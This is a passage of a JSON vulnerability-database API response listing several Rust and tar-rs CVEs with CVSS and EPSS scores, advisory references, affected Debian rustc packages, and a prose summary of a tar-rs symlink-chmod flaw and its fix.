ments":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/"},{"reference_url":"https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html","reference_id":"cve-2022-21658.html","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html"},{"reference_url":"https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2","reference_id":"GHSA-r9cc-f5pr-p3j2","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://support.apple.com/kb/HT213182","reference_id":"HT213182","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://support.apple.com/kb/HT213182"},{"reference_url":"https://support.apple.com/kb/HT213183","reference_id":"HT213183","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://support.apple.com/kb/HT213183"},{"reference_url":"https://support.apple.com/kb/HT213186","reference_id":"HT213186","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://support.apple.com/kb/HT213186"},{"reference_url":"https://support.apple.com/kb/HT213193","reference_id":"HT213193","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://support.apple.com/kb/HT213193"},{"reference_url":"https://access.redhat.com/errata/RHSA-2022:1894","reference_id":"RHSA-2022:1894","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2022:1894"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2022-21658"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j9kg-rd4y-y7by"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31472?format=json","vulnerability_id":"VCID-pbjz-th4w-tqgb","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28879","reference_id":"","reference_type":"","scores":[{"value":"0.011","scoring_system":"epss","scoring_elements":"0.77984","published_at":"2026-04-01T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78123","published_at":"2026-04-29T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78102","published_at":"2026-04-24T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78109","published_at":"2026-04-26T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.77992","published_at":"2026-04-02T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78022","published_at":"2026-04-04T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78004","published_at":"2026-04-07T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.7803","published_at":"2026-04-08T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78035","published_at":"2026-04-09T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78061","published_at":"2026-04-11T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78044","published_at":"2026-04-12T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78041","published_at":"2026-04-13T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78077","published_at":"2026-04-16T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78075","published_at":"2026-04-18T12:55:00Z"},{"value":"0.011","scoring_system":"epss","scoring_elements":"0.78069","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28879"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949211","reference_id":"1949211","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949211"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1801","reference_id":"AVG-1801","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1801"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-28879"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pbjz-th4w-tqgb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31471?format=json","vulnerability_id":"VCID-pvm9-wtbx-1ubx","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28878","reference_id":"","reference_type":"","scores":[{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77065","published_at":"2026-04-01T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77216","published_at":"2026-04-29T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77195","published_at":"2026-04-24T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77202","published_at":"2026-04-26T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77071","published_at":"2026-04-02T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.771","published_at":"2026-04-04T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77082","published_at":"2026-04-07T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77115","published_at":"2026-04-08T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77124","published_at":"2026-04-09T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77152","published_at":"2026-04-11T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77131","published_at":"2026-04-12T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77126","published_at":"2026-04-13T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77167","published_at":"2026-04-16T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77169","published_at":"2026-04-18T12:55:00Z"},{"value":"0.01012","scoring_system":"epss","scoring_elements":"0.77161","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28878"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949207","reference_id":"1949207","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949207"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1801","reference_id":"AVG-1801","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1801"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-28878"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pvm9-wtbx-1ubx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/24628?format=json","vulnerability_id":"VCID-qj1y-b8m1-hyfm","summary":"tar-rs `unpack_in` can chmod arbitrary directories by following symlinks\n## Summary\n\nWhen unpacking a tar archive, the `tar` crate's `unpack_dir` function uses `fs::metadata()` to check whether a path that already exists is a directory. Because `fs::metadata()` follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply `chmod` to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root.\n\n## Reproducer\n\nA malicious tarball contains two entries: (1) a symlink `foo` pointing to an arbitrary external directory, and (2) a directory entry `foo/.` (or just `foo`). When unpacked, `create_dir(\"foo\")` fails with `EEXIST` because the symlink is already on disk. The `fs::metadata()` check then follows the symlink, sees a directory at the target, and allows processing to continue. The directory entry's mode bits are then applied via `chmod`, which also follows the symlink — modifying the permissions of the external target directory.\n\n## Fix \n\nThe fix is very simple, we now use `fs::symlink_metadata()` in `unpack_dir`, so symlinks are detected and rejected rather than followed.\n\n## Credit\n\nThis issue was reported by @xokdvium - thank you!","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33056","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01448","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01422","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01431","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.0144","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01446","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01441","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01436","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01432","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01946","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01916","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01922","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01912","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33056"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056"},{"reference_url":"https://github.com/alexcrichton/tar-rs","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/alexcrichton/tar-rs"},{"reference_url":"https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/"}],"url":"https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446"},{"reference_url":"https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/"}],"url":"https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33056","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33056"},{"reference_url":"https://rustsec.org/advisories/RUSTSEC-2026-0067.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://rustsec.org/advisories/RUSTSEC-2026-0067.html"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481","reference_id":"1131481","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2449490","reference_id":"2449490","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2449490"},{"reference_url":"https://github.com/advisories/GHSA-j4xf-2g29-59ph","reference_id":"GHSA-j4xf-2g29-59ph","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j4xf-2g29-59ph"},{"reference_url":"https://usn.ubuntu.com/8138-1/","reference_id":"USN-8138-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8138-1/"},{"reference_url":"https://usn.ubuntu.com/8138-2/","reference_id":"USN-8138-2","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8138-2/"},{"reference_url":"https://usn.ubuntu.com/8139-1/","reference_id":"USN-8139-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8139-1/"},{"reference_url":"https://usn.ubuntu.com/8168-1/","reference_id":"USN-8168-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8168-1/"},{"reference_url":"https://usn.ubuntu.com/8168-2/","reference_id":"USN-8168-2","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8168-2/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1056288?format=json","purl":"pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9"},{"url":"http://public2.vulnerablecode.io/api/packages/1056290?format=json","purl":"pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2"}],"aliases":["CVE-2026-33056","GHSA-j4xf-2g29-59ph"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qj1y-b8m1-hyfm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80738?format=json","vulnerability_id":"VCID-wdu6-3vph-aqb7","summary":"rust: use-after-free or double free in VecDeque::make_contiguous","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-36318","reference_id":"","reference_type":"","scores":[{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57759","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57834","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57833","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57851","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57843","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57863","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57838","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57893","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57894","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57911","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57887","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57867","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57896","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57895","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.57873","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-36318"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949192","reference_id":"1949192","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949192"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1804","reference_id":"AVG-1804","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1804"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:1935","reference_id":"RHSA-2021:1935","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:1935"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:2243","reference_id":"RHSA-2021:2243","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:2243"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2020-36318"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wdu6-3vph-aqb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80677?format=json","vulnerability_id":"VCID-wpe1-jr23-duhh","summary":"rust: optimization for joining strings can cause uninitialized bytes to be exposed","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-36323","reference_id":"","reference_type":"","scores":[{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72059","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72186","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72182","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72191","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72065","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72086","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72062","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72099","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72111","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72134","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72118","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72104","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72145","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72152","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00705","scoring_system":"epss","scoring_elements":"0.72138","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-36323"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323","reference_id